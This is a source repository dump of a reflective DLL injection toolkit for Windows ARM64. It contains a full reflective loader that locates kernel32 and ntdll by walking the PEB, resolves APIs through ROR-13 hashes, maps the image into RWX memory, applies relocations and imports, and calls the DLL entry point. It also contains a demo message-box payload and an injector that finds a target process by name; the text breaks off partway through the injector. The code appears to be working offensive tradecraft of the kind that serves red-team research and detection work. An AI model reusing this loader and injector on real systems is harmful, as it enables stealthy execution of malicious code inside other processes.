├── .gitattributes ├── arm64_reflective_dll_injection.h ├── .gitignore ├── arm64_dll.c ├── arm64_reflective_loader.h ├── arm64_reflective_loader.c ├── arm64_injector.c └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /arm64_reflective_dll_injection.h: -------------------------------------------------------------------------------- 1 | #ifndef ARM64_REFLECTIVE_DLL_INJECTION_H 2 | #define ARM64_REFLECTIVE_DLL_INJECTION_H 3 | 4 | #define WIN32_LEAN_AND_MEAN 5 | #include 6 | 7 | #define DLL_QUERY_HMODULE 6 8 | 9 | typedef ULONG_PTR(WINAPI *REFLECTIVELOADER_FN)(LPVOID); 10 | typedef BOOL(WINAPI *DLLMAIN_FN)(HINSTANCE, DWORD, LPVOID); 11 | 12 | #define DLLEXPORT __declspec(dllexport) 13 | 14 | #endif -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. 
Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | -------------------------------------------------------------------------------- /arm64_dll.c: -------------------------------------------------------------------------------- 1 | #include "arm64_reflective_dll_injection.h" 2 | #include 3 | 4 | HINSTANCE g_hModule = NULL; 5 | 6 | BOOL WINAPI PayloadDllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) 7 | { 8 | switch (dwReason) 9 | { 10 | case DLL_PROCESS_ATTACH: 11 | g_hModule = hinstDLL; 12 | MessageBoxA(NULL, "Reflective DLL Injection on Windows ARM64 - working!", "ARM64 RDI", MB_OK); 13 | break; 14 | case DLL_QUERY_HMODULE: 15 | if (lpReserved != NULL) 16 | { 17 | *(HMODULE *)lpReserved = g_hModule; 18 | } 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } -------------------------------------------------------------------------------- /arm64_reflective_loader.h: -------------------------------------------------------------------------------- 1 | #ifndef ARM64_REFLECTIVE_LOADER_H 2 | #define ARM64_REFLECTIVE_LOADER_H 3 | 4 | #include "arm64_reflective_dll_injection.h" 5 | #include 6 | 7 | typedef HMODULE(WINAPI *LOADLIBRARYA_FN)(LPCSTR); 8 | typedef FARPROC(WINAPI *GETPROCADDRESS_FN)(HMODULE, LPCSTR); 9 | typedef LPVOID(WINAPI *VIRTUALALLOC_FN)(LPVOID, SIZE_T, DWORD, DWORD); 10 | typedef DWORD(NTAPI *NTFLUSHINSTRUCTIONCACHE_FN)(HANDLE, PVOID, ULONG); 11 | 12 | #define KERNEL32DLL_HASH 0x6A4ABC5B 13 | #define NTDLLDLL_HASH 0x3CFA685D 14 | 15 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 16 | #define GETPROCADDRESS_HASH 
0x7C0DFCAA 17 | #define VIRTUALALLOC_HASH 0x91AFCA54 18 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 19 | 20 | #define HASH_KEY 13 21 | 22 | #pragma intrinsic(_rotr) 23 | static __forceinline DWORD ror_dword_loader(DWORD d) 24 | { 25 | return _rotr(d, HASH_KEY); 26 | } 27 | 28 | static __forceinline DWORD hash_string_loader(char *c) 29 | { 30 | register DWORD h = 0; 31 | do 32 | { 33 | h = ror_dword_loader(h); 34 | h += *c; 35 | } while (*++c); 36 | return h; 37 | } 38 | 39 | typedef struct _UNICODE_STRING_LDR 40 | { 41 | USHORT Length; 42 | USHORT MaximumLength; 43 | PWSTR Buffer; 44 | } UNICODE_STRING_LDR, *PUNICODE_STRING_LDR; 45 | 46 | typedef struct _PEB_LDR_DATA_LDR 47 | { 48 | ULONG Length; 49 | BOOLEAN Initialized; 50 | HANDLE SsHandle; 51 | LIST_ENTRY InLoadOrderModuleList; 52 | LIST_ENTRY InMemoryOrderModuleList; 53 | LIST_ENTRY InInitializationOrderModuleList; 54 | PVOID EntryInProgress; 55 | BOOLEAN ShutdownInProgress; 56 | HANDLE ShutdownThreadId; 57 | } PEB_LDR_DATA_LDR, *PPEB_LDR_DATA_LDR; 58 | 59 | typedef struct _LDR_DATA_TABLE_ENTRY_LDR 60 | { 61 | LIST_ENTRY InLoadOrderLinks; 62 | LIST_ENTRY InMemoryOrderLinks; 63 | LIST_ENTRY InInitializationOrderLinks; 64 | PVOID DllBase; 65 | PVOID EntryPoint; 66 | ULONG SizeOfImage; 67 | UNICODE_STRING_LDR FullDllName; 68 | UNICODE_STRING_LDR BaseDllName; 69 | ULONG Flags; 70 | USHORT LoadCount; 71 | USHORT TlsIndex; 72 | union 73 | { 74 | LIST_ENTRY HashLinks; 75 | struct 76 | { 77 | PVOID SectionPointer; 78 | ULONG CheckSum; 79 | }; 80 | }; 81 | union 82 | { 83 | ULONG TimeDateStamp; 84 | PVOID LoadedImports; 85 | }; 86 | PVOID EntryPointActivationContext; 87 | PVOID PatchInformation; 88 | LIST_ENTRY ForwarderLinks; 89 | LIST_ENTRY ServiceTagLinks; 90 | LIST_ENTRY StaticLinks; 91 | } LDR_DATA_TABLE_ENTRY_LDR, *PLDR_DATA_TABLE_ENTRY_LDR; 92 | 93 | typedef struct _PEB_LDR 94 | { 95 | BOOLEAN InheritedAddressSpace; 96 | BOOLEAN ReadImageFileExecOptions; 97 | BOOLEAN BeingDebugged; 98 | union 99 | { 100 | 
BOOLEAN BitField; 101 | struct 102 | { 103 | BOOLEAN ImageUsesLargePages : 1; 104 | BOOLEAN IsProtectedProcess : 1; 105 | BOOLEAN IsImageDynamicallyRelocated : 1; 106 | BOOLEAN SkipPatchingUser32Forwarders : 1; 107 | BOOLEAN IsPackagedProcess : 1; 108 | BOOLEAN IsAppContainer : 1; 109 | BOOLEAN IsProtectedProcessLight : 1; 110 | BOOLEAN IsLongPathAware : 1; 111 | }; 112 | }; 113 | HANDLE Mutant; 114 | PVOID ImageBaseAddress; 115 | PPEB_LDR_DATA_LDR Ldr; 116 | PVOID ProcessParameters; 117 | PVOID SubSystemData; 118 | PVOID ProcessHeap; 119 | PVOID FastPebLock; 120 | PVOID AtlThunkSListPtr; 121 | PVOID IFEOKey; 122 | union 123 | { 124 | ULONG CrossProcessFlags; 125 | struct 126 | { 127 | ULONG ProcessInJob : 1; 128 | ULONG ProcessInitializing : 1; 129 | ULONG ProcessUsingVEH : 1; 130 | ULONG ProcessUsingVCH : 1; 131 | ULONG ProcessUsingFTH : 1; 132 | ULONG ProcessPreviouslyThrottled : 1; 133 | ULONG ProcessCurrentlyThrottled : 1; 134 | ULONG ProcessImagesHotPatched : 1; 135 | ULONG ReservedBits0 : 24; 136 | }; 137 | }; 138 | union 139 | { 140 | PVOID KernelCallbackTable; 141 | PVOID UserSharedInfoPtr; 142 | }; 143 | ULONG SystemReserved; 144 | ULONG AtlThunkSListPtr32; 145 | PVOID ApiSetMap; 146 | ULONG TlsExpansionCounter; 147 | PVOID TlsBitmap; 148 | ULONG TlsBitmapBits[2]; 149 | PVOID ReadOnlySharedMemoryBase; 150 | PVOID SharedData; 151 | PVOID *ReadOnlyStaticServerData; 152 | PVOID AnsiCodePageData; 153 | PVOID OemCodePageData; 154 | PVOID UnicodeCaseTableData; 155 | ULONG NumberOfProcessors; 156 | ULONG NtGlobalFlag; 157 | LARGE_INTEGER CriticalSectionTimeout; 158 | SIZE_T HeapSegmentReserve; 159 | SIZE_T HeapSegmentCommit; 160 | SIZE_T HeapDeCommitTotalFreeThreshold; 161 | SIZE_T HeapDeCommitFreeBlockThreshold; 162 | ULONG NumberOfHeaps; 163 | ULONG MaximumNumberOfHeaps; 164 | PVOID *ProcessHeaps; 165 | PVOID GdiSharedHandleTable; 166 | PVOID ProcessStarterHelper; 167 | ULONG GdiDCAttributeList; 168 | PVOID LoaderLock; 169 | ULONG OSMajorVersion; 170 | ULONG 
OSMinorVersion; 171 | USHORT OSBuildNumber; 172 | USHORT OSCSDVersion; 173 | ULONG OSPlatformId; 174 | ULONG ImageSubsystem; 175 | ULONG ImageSubsystemMajorVersion; 176 | ULONG ImageSubsystemMinorVersion; 177 | ULONG_PTR ActiveProcessAffinityMask; 178 | ULONG GdiHandleBuffer[60]; 179 | PVOID PostProcessInitRoutine; 180 | PVOID TlsExpansionBitmap; 181 | ULONG TlsExpansionBitmapBits[32]; 182 | ULONG SessionId; 183 | ULARGE_INTEGER AppCompatFlags; 184 | ULARGE_INTEGER AppCompatFlagsUser; 185 | PVOID pShimData; 186 | PVOID AppCompatInfo; 187 | UNICODE_STRING_LDR CSDVersion; 188 | PVOID ActivationContextData; 189 | PVOID ProcessAssemblyStorageMap; 190 | PVOID SystemDefaultActivationContextData; 191 | PVOID SystemAssemblyStorageMap; 192 | SIZE_T MinimumStackCommit; 193 | PVOID SparePointers[2]; 194 | PVOID PatchLoaderData; 195 | PVOID ChpeV2ProcessInfo; 196 | ULONG AppModelFeatureState; 197 | ULONG SpareUlongs[2]; 198 | USHORT ActiveConsoleId; 199 | USHORT AppCompatVersionInfo; 200 | PVOID ExtendedProcessInfo; 201 | } PEB_LDR, *PPEB_LDR; 202 | 203 | typedef struct _IMAGE_RELOC_LDR 204 | { 205 | WORD offset : 12; 206 | WORD type : 4; 207 | } IMAGE_RELOC_LDR, *PIMAGE_RELOC_LDR; 208 | 209 | #endif -------------------------------------------------------------------------------- /arm64_reflective_loader.c: -------------------------------------------------------------------------------- 1 | #include "arm64_reflective_loader.h" 2 | 3 | __declspec(noinline) ULONG_PTR GetIp(VOID) 4 | { 5 | return (ULONG_PTR)_ReturnAddress(); 6 | } 7 | 8 | DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpLoaderParameter) 9 | { 10 | LOADLIBRARYA_FN fnLoadLibraryA = NULL; 11 | GETPROCADDRESS_FN fnGetProcAddress = NULL; 12 | VIRTUALALLOC_FN fnVirtualAlloc = NULL; 13 | NTFLUSHINSTRUCTIONCACHE_FN fnNtFlushInstructionCache = NULL; 14 | 15 | ULONG_PTR uiDllBase; 16 | ULONG_PTR uiPeb; 17 | ULONG_PTR uiKernel32Base = 0; 18 | ULONG_PTR uiNtdllBase = 0; 19 | 20 | uiDllBase = GetIp(); 21 | 22 | while 
(TRUE) 23 | { 24 | if (((PIMAGE_DOS_HEADER)uiDllBase)->e_magic == IMAGE_DOS_SIGNATURE) 25 | { 26 | ULONG_PTR uiHeader = uiDllBase + ((PIMAGE_DOS_HEADER)uiDllBase)->e_lfanew; 27 | if (((PIMAGE_NT_HEADERS)uiHeader)->Signature == IMAGE_NT_SIGNATURE) 28 | break; 29 | } 30 | uiDllBase--; 31 | } 32 | 33 | uiPeb = __readx18qword(0x60); 34 | PPEB_LDR_DATA_LDR pLdr = ((PPEB_LDR)uiPeb)->Ldr; 35 | PLIST_ENTRY pModuleList = &(pLdr->InMemoryOrderModuleList); 36 | PLIST_ENTRY pCurrentEntry = pModuleList->Flink; 37 | 38 | while (pCurrentEntry != pModuleList) 39 | { 40 | PLDR_DATA_TABLE_ENTRY_LDR pEntry = (PLDR_DATA_TABLE_ENTRY_LDR)CONTAINING_RECORD(pCurrentEntry, LDR_DATA_TABLE_ENTRY_LDR, InMemoryOrderLinks); 41 | if (pEntry->BaseDllName.Length > 0 && pEntry->BaseDllName.Buffer != NULL) 42 | { 43 | DWORD dwModuleHash = 0; 44 | USHORT usCounter = pEntry->BaseDllName.Length; 45 | BYTE *pNameByte = (BYTE *)pEntry->BaseDllName.Buffer; 46 | 47 | do 48 | { 49 | dwModuleHash = ror_dword_loader(dwModuleHash); 50 | if (*pNameByte >= 'a' && *pNameByte <= 'z') 51 | { 52 | dwModuleHash += (*pNameByte - 0x20); 53 | } 54 | else 55 | { 56 | dwModuleHash += *pNameByte; 57 | } 58 | pNameByte++; 59 | } while (--usCounter); 60 | 61 | if (dwModuleHash == KERNEL32DLL_HASH) 62 | { 63 | uiKernel32Base = (ULONG_PTR)pEntry->DllBase; 64 | } 65 | else if (dwModuleHash == NTDLLDLL_HASH) 66 | { 67 | uiNtdllBase = (ULONG_PTR)pEntry->DllBase; 68 | } 69 | } 70 | if (uiKernel32Base && uiNtdllBase) 71 | break; 72 | pCurrentEntry = pCurrentEntry->Flink; 73 | } 74 | 75 | if (!uiKernel32Base || !uiNtdllBase) 76 | return 0; 77 | 78 | PIMAGE_NT_HEADERS pOldNtHeaders = (PIMAGE_NT_HEADERS)(uiDllBase + ((PIMAGE_DOS_HEADER)uiDllBase)->e_lfanew); 79 | ULONG_PTR uiExportDir = uiKernel32Base + ((PIMAGE_NT_HEADERS)(uiKernel32Base + ((PIMAGE_DOS_HEADER)uiKernel32Base)->e_lfanew))->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 80 | PIMAGE_EXPORT_DIRECTORY pExportDirectory = 
(PIMAGE_EXPORT_DIRECTORY)uiExportDir; 81 | ULONG_PTR uiAddressOfNames = uiKernel32Base + pExportDirectory->AddressOfNames; 82 | ULONG_PTR uiAddressOfFunctions = uiKernel32Base + pExportDirectory->AddressOfFunctions; 83 | ULONG_PTR uiAddressOfNameOrdinals = uiKernel32Base + pExportDirectory->AddressOfNameOrdinals; 84 | 85 | for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) 86 | { 87 | char *cName = (char *)(uiKernel32Base + ((DWORD *)uiAddressOfNames)[i]); 88 | DWORD dwHashVal = hash_string_loader(cName); 89 | if (dwHashVal == LOADLIBRARYA_HASH) 90 | fnLoadLibraryA = (LOADLIBRARYA_FN)(uiKernel32Base + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 91 | else if (dwHashVal == GETPROCADDRESS_HASH) 92 | fnGetProcAddress = (GETPROCADDRESS_FN)(uiKernel32Base + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 93 | else if (dwHashVal == VIRTUALALLOC_HASH) 94 | fnVirtualAlloc = (VIRTUALALLOC_FN)(uiKernel32Base + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 95 | if (fnLoadLibraryA && fnGetProcAddress && fnVirtualAlloc) 96 | break; 97 | } 98 | 99 | if (!fnLoadLibraryA || !fnGetProcAddress || !fnVirtualAlloc) 100 | return 0; 101 | 102 | uiExportDir = uiNtdllBase + ((PIMAGE_NT_HEADERS)(uiNtdllBase + ((PIMAGE_DOS_HEADER)uiNtdllBase)->e_lfanew))->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; 103 | pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)uiExportDir; 104 | uiAddressOfNames = uiNtdllBase + pExportDirectory->AddressOfNames; 105 | uiAddressOfFunctions = uiNtdllBase + pExportDirectory->AddressOfFunctions; 106 | uiAddressOfNameOrdinals = uiNtdllBase + pExportDirectory->AddressOfNameOrdinals; 107 | 108 | for (DWORD i = 0; i < pExportDirectory->NumberOfNames; i++) 109 | { 110 | char *cName = (char *)(uiNtdllBase + ((DWORD *)uiAddressOfNames)[i]); 111 | if (hash_string_loader(cName) == NTFLUSHINSTRUCTIONCACHE_HASH) 112 | { 113 | fnNtFlushInstructionCache = 
(NTFLUSHINSTRUCTIONCACHE_FN)(uiNtdllBase + ((DWORD *)uiAddressOfFunctions)[((WORD *)uiAddressOfNameOrdinals)[i]]); 114 | break; 115 | } 116 | } 117 | 118 | if (!fnNtFlushInstructionCache) 119 | return 0; 120 | 121 | ULONG_PTR uiNewImageBase = (ULONG_PTR)fnVirtualAlloc(NULL, pOldNtHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 122 | if (!uiNewImageBase) 123 | return 0; 124 | 125 | for (DWORD i = 0; i < pOldNtHeaders->OptionalHeader.SizeOfHeaders; i++) 126 | { 127 | ((BYTE *)uiNewImageBase)[i] = ((BYTE *)uiDllBase)[i]; 128 | } 129 | 130 | PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)&pOldNtHeaders->OptionalHeader + pOldNtHeaders->FileHeader.SizeOfOptionalHeader); 131 | for (WORD i = 0; i < pOldNtHeaders->FileHeader.NumberOfSections; i++) 132 | { 133 | for (DWORD j = 0; j < pSectionHeader[i].SizeOfRawData; j++) 134 | { 135 | ((BYTE *)(uiNewImageBase + pSectionHeader[i].VirtualAddress))[j] = ((BYTE *)(uiDllBase + pSectionHeader[i].PointerToRawData))[j]; 136 | } 137 | } 138 | 139 | ULONG_PTR uiDelta = uiNewImageBase - pOldNtHeaders->OptionalHeader.ImageBase; 140 | PIMAGE_DATA_DIRECTORY pRelocationData = &pOldNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; 141 | 142 | if (pRelocationData->Size > 0 && uiDelta != 0) 143 | { 144 | PIMAGE_BASE_RELOCATION pRelocBlock = (PIMAGE_BASE_RELOCATION)(uiNewImageBase + pRelocationData->VirtualAddress); 145 | while (pRelocBlock->VirtualAddress) 146 | { 147 | DWORD dwEntryCount = (pRelocBlock->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC_LDR); 148 | PIMAGE_RELOC_LDR pRelocEntry = (PIMAGE_RELOC_LDR)((ULONG_PTR)pRelocBlock + sizeof(IMAGE_BASE_RELOCATION)); 149 | for (DWORD k = 0; k < dwEntryCount; k++) 150 | { 151 | if (pRelocEntry[k].type == IMAGE_REL_BASED_DIR64) 152 | { 153 | *(ULONG_PTR *)(uiNewImageBase + pRelocBlock->VirtualAddress + pRelocEntry[k].offset) += uiDelta; 154 | } 155 | } 156 | pRelocBlock = 
(PIMAGE_BASE_RELOCATION)((ULONG_PTR)pRelocBlock + pRelocBlock->SizeOfBlock); 157 | } 158 | } 159 | 160 | PIMAGE_DATA_DIRECTORY pImportData = &pOldNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; 161 | if (pImportData->Size > 0) 162 | { 163 | PIMAGE_IMPORT_DESCRIPTOR pImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)(uiNewImageBase + pImportData->VirtualAddress); 164 | while (pImportDesc->Name) 165 | { 166 | char *sModuleName = (char *)(uiNewImageBase + pImportDesc->Name); 167 | HINSTANCE hModule = fnLoadLibraryA(sModuleName); 168 | if (hModule) 169 | { 170 | PIMAGE_THUNK_DATA pOriginalFirstThunk = (PIMAGE_THUNK_DATA)(uiNewImageBase + pImportDesc->OriginalFirstThunk); 171 | PIMAGE_THUNK_DATA pFirstThunk = (PIMAGE_THUNK_DATA)(uiNewImageBase + pImportDesc->FirstThunk); 172 | if (!pOriginalFirstThunk) 173 | pOriginalFirstThunk = pFirstThunk; 174 | 175 | while (pOriginalFirstThunk->u1.AddressOfData) 176 | { 177 | FARPROC pfnImportedFunc; 178 | if (IMAGE_SNAP_BY_ORDINAL(pOriginalFirstThunk->u1.Ordinal)) 179 | { 180 | pfnImportedFunc = fnGetProcAddress(hModule, (LPCSTR)(pOriginalFirstThunk->u1.Ordinal & 0xFFFF)); 181 | } 182 | else 183 | { 184 | PIMAGE_IMPORT_BY_NAME pImportByName = (PIMAGE_IMPORT_BY_NAME)(uiNewImageBase + pOriginalFirstThunk->u1.AddressOfData); 185 | pfnImportedFunc = fnGetProcAddress(hModule, pImportByName->Name); 186 | } 187 | pFirstThunk->u1.Function = (ULONG_PTR)pfnImportedFunc; 188 | pOriginalFirstThunk++; 189 | pFirstThunk++; 190 | } 191 | } 192 | pImportDesc++; 193 | } 194 | } 195 | 196 | DLLMAIN_FN fnDllEntry = (DLLMAIN_FN)(uiNewImageBase + pOldNtHeaders->OptionalHeader.AddressOfEntryPoint); 197 | fnNtFlushInstructionCache((HANDLE)-1, NULL, 0); 198 | fnDllEntry((HINSTANCE)uiNewImageBase, DLL_PROCESS_ATTACH, lpLoaderParameter); 199 | 200 | return uiNewImageBase; 201 | } -------------------------------------------------------------------------------- /arm64_injector.c: 
-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "arm64_reflective_dll_injection.h" 8 | 9 | #ifndef IMAGE_FILE_MACHINE_ARM64 10 | #define IMAGE_FILE_MACHINE_ARM64 0xAA64 11 | #endif 12 | 13 | void DisplayBanner() 14 | { 15 | HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE); 16 | CONSOLE_SCREEN_BUFFER_INFO consoleInfo; 17 | WORD saved_attributes; 18 | 19 | GetConsoleScreenBufferInfo(hConsole, &consoleInfo); 20 | saved_attributes = consoleInfo.wAttributes; 21 | 22 | SetConsoleTextAttribute(hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_INTENSITY); 23 | 24 | printf("=====================================================================\n"); 25 | printf("| Reflective DLL Injection on Windows ARM64 |\n"); 26 | printf("| By @xaitax |\n"); 27 | printf("=====================================================================\n\n"); 28 | 29 | SetConsoleTextAttribute(hConsole, saved_attributes); 30 | } 31 | 32 | BOOL IsHostARM64() 33 | { 34 | SYSTEM_INFO sysInfo; 35 | GetNativeSystemInfo(&sysInfo); 36 | return sysInfo.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_ARM64; 37 | } 38 | 39 | void PrintWindowsVersion() 40 | { 41 | OSVERSIONINFOEXW osvi; 42 | typedef NTSTATUS(WINAPI * RTL_GET_VERSION_PROC)(LPOSVERSIONINFOEXW); 43 | RTL_GET_VERSION_PROC RtlGetVersionFunc = NULL; 44 | 45 | HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); 46 | char szOsDisplayName[128]; 47 | char szOsMarketingName[32] = "Windows"; 48 | 49 | if (hNtdll) 50 | { 51 | RtlGetVersionFunc = (RTL_GET_VERSION_PROC)GetProcAddress(hNtdll, "RtlGetVersion"); 52 | if (RtlGetVersionFunc) 53 | { 54 | ZeroMemory(&osvi, sizeof(OSVERSIONINFOEXW)); 55 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW); 56 | if (RtlGetVersionFunc(&osvi) == 0) 57 | { 58 | 59 | if (osvi.dwMajorVersion == 10 && osvi.dwMinorVersion == 0 && osvi.dwBuildNumber >= 22000) 60 | { 61 | strcpy_s(szOsMarketingName, 
sizeof(szOsMarketingName), "Windows 11"); 62 | } 63 | else if (osvi.dwMajorVersion == 10 && osvi.dwMinorVersion == 0) 64 | { 65 | strcpy_s(szOsMarketingName, sizeof(szOsMarketingName), "Windows 10"); 66 | } 67 | sprintf_s(szOsDisplayName, sizeof(szOsDisplayName), "%s (Build %lu)", 68 | szOsMarketingName, 69 | osvi.dwBuildNumber); 70 | printf(" Host OS: %s\n", szOsDisplayName); 71 | return; 72 | } 73 | } 74 | } 75 | printf(" Host OS: Unable to determine Windows version.\n"); 76 | } 77 | 78 | DWORD GetProcessIdByName(const char *processName) 79 | { 80 | PROCESSENTRY32 entry; 81 | entry.dwSize = sizeof(PROCESSENTRY32); 82 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 83 | DWORD pid = 0; 84 | 85 | if (snapshot == INVALID_HANDLE_VALUE) 86 | { 87 | printf(" CreateToolhelp32Snapshot failed. Error: %lu\n", GetLastError()); 88 | return 0; 89 | } 90 | 91 | if (Process32First(snapshot, &entry) == TRUE) 92 | { 93 | while (Process32Next(snapshot, &entry) == TRUE) 94 | { 95 | if (_stricmp(entry.szExeFile, processName) == 0) 96 | { 97 | pid = entry.th32ProcessID; 98 | break; 99 | } 100 | } 101 | } 102 | else 103 | { 104 | printf(" Process32First failed. 
Error: %lu\n", GetLastError()); 105 | } 106 | 107 | CloseHandle(snapshot); 108 | return pid; 109 | } 110 | 111 | DWORD RvaToOffset_Injector(DWORD dwRva, PIMAGE_NT_HEADERS pNtHeaders, LPVOID lpFileBase) 112 | { 113 | PIMAGE_SECTION_HEADER pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders); 114 | 115 | if (pNtHeaders->FileHeader.NumberOfSections == 0) 116 | { 117 | if (dwRva < pNtHeaders->OptionalHeader.SizeOfHeaders) 118 | { 119 | return dwRva; 120 | } 121 | else 122 | { 123 | return 0; 124 | } 125 | } 126 | 127 | if (dwRva < pSectionHeader[0].VirtualAddress) 128 | { 129 | if (dwRva < pNtHeaders->OptionalHeader.SizeOfHeaders) 130 | { 131 | return dwRva; 132 | } 133 | else 134 | { 135 | return 0; 136 | } 137 | } 138 | 139 | for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++) 140 | { 141 | if (dwRva >= pSectionHeader[i].VirtualAddress && 142 | dwRva < (pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)) 143 | { 144 | return (pSectionHeader[i].PointerToRawData + (dwRva - pSectionHeader[i].VirtualAddress)); 145 | } 146 | } 147 | return 0; 148 | } 149 | 150 | DWORD GetReflectiveLoaderOffset(LPVOID lpFileBuffer) 151 | { 152 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpFileBuffer; 153 | if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) 154 | { 155 | printf(" Invalid DOS signature.\n"); 156 | return 0; 157 | } 158 | PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)lpFileBuffer + pDosHeader->e_lfanew); 159 | if (pNtHeaders->Signature != IMAGE_NT_SIGNATURE) 160 | { 161 | printf(" Invalid NT signature.\n"); 162 | return 0; 163 | } 164 | if (pNtHeaders->FileHeader.Machine != IMAGE_FILE_MACHINE_ARM64) 165 | { 166 | printf(" DLL is not ARM64. 
Machine: 0x%hX\n", pNtHeaders->FileHeader.Machine); 167 | return 0; 168 | } 169 | if (pNtHeaders->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC) 170 | { 171 | printf(" DLL is not PE32+.\n"); 172 | return 0; 173 | } 174 | 175 | PIMAGE_DATA_DIRECTORY pExportDataDir = &pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 176 | if (pExportDataDir->VirtualAddress == 0 || pExportDataDir->Size == 0) 177 | { 178 | printf(" No export directory found.\n"); 179 | return 0; 180 | } 181 | 182 | DWORD exportDirFileOffset = RvaToOffset_Injector(pExportDataDir->VirtualAddress, pNtHeaders, lpFileBuffer); 183 | if (exportDirFileOffset == 0 && pExportDataDir->VirtualAddress != 0) 184 | { 185 | printf(" Could not convert export directory RVA 0x%lX to offset.\n", pExportDataDir->VirtualAddress); 186 | return 0; 187 | } 188 | 189 | PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)lpFileBuffer + exportDirFileOffset); 190 | 191 | if (pExportDir->AddressOfNames == 0 || pExportDir->AddressOfNameOrdinals == 0 || pExportDir->AddressOfFunctions == 0) 192 | { 193 | printf(" Export directory contains null RVA(s) for names, ordinals, or functions.\n"); 194 | return 0; 195 | } 196 | 197 | DWORD namesOffset = RvaToOffset_Injector(pExportDir->AddressOfNames, pNtHeaders, lpFileBuffer); 198 | DWORD ordinalsOffset = RvaToOffset_Injector(pExportDir->AddressOfNameOrdinals, pNtHeaders, lpFileBuffer); 199 | DWORD functionsOffset = RvaToOffset_Injector(pExportDir->AddressOfFunctions, pNtHeaders, lpFileBuffer); 200 | 201 | if (namesOffset == 0 && pExportDir->AddressOfNames != 0) 202 | { 203 | printf(" Failed to convert AddressOfNames RVA (0x%lX) to offset.\n", pExportDir->AddressOfNames); 204 | return 0; 205 | } 206 | if (ordinalsOffset == 0 && pExportDir->AddressOfNameOrdinals != 0) 207 | { 208 | printf(" Failed to convert AddressOfNameOrdinals RVA (0x%lX) to offset.\n", pExportDir->AddressOfNameOrdinals); 209 | return 0; 210 | } 211 | if (functionsOffset 
== 0 && pExportDir->AddressOfFunctions != 0) 212 | { 213 | printf(" Failed to convert AddressOfFunctions RVA (0x%lX) to offset.\n", pExportDir->AddressOfFunctions); 214 | return 0; 215 | } 216 | 217 | DWORD *pNamesRva = (DWORD *)((ULONG_PTR)lpFileBuffer + namesOffset); 218 | WORD *pOrdinals = (WORD *)((ULONG_PTR)lpFileBuffer + ordinalsOffset); 219 | DWORD *pAddressesRva = (DWORD *)((ULONG_PTR)lpFileBuffer + functionsOffset); 220 | 221 | for (DWORD i = 0; i < pExportDir->NumberOfNames; i++) 222 | { 223 | if (pNamesRva[i] == 0) 224 | continue; 225 | DWORD funcNameFileOffset = RvaToOffset_Injector(pNamesRva[i], pNtHeaders, lpFileBuffer); 226 | if (funcNameFileOffset == 0 && pNamesRva[i] != 0) 227 | { 228 | printf(" Failed to convert function name RVA (0x%lX) for index %lu to offset.\n", pNamesRva[i], i); 229 | continue; 230 | } 231 | char *funcName = (char *)((ULONG_PTR)lpFileBuffer + funcNameFileOffset); 232 | 233 | if (strcmp(funcName, 